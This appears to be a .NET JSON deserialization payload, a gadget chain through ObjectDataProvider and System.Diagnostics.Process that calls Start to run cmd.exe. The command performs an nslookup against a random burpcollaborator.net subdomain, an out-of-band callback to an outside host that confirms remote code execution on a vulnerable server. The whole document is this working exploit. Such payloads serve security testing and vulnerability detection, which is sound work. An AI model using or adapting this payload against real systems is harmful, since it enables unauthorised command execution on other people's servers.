{"$types":{"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35":"1","System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"2", "System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089":"3"},"$type":"1","ObjectInstance":{"$type":"2","StartInfo":{"$type":"3","FileName":"cmd.exe","Arguments":"/c nslookup hrcvkcpshz9ssqrw6112w7cnieo4ct..acqohj281hfiv1wa0ufams6p0g6fu4.burpcollaborator.net"}},"MethodName":"Start"}
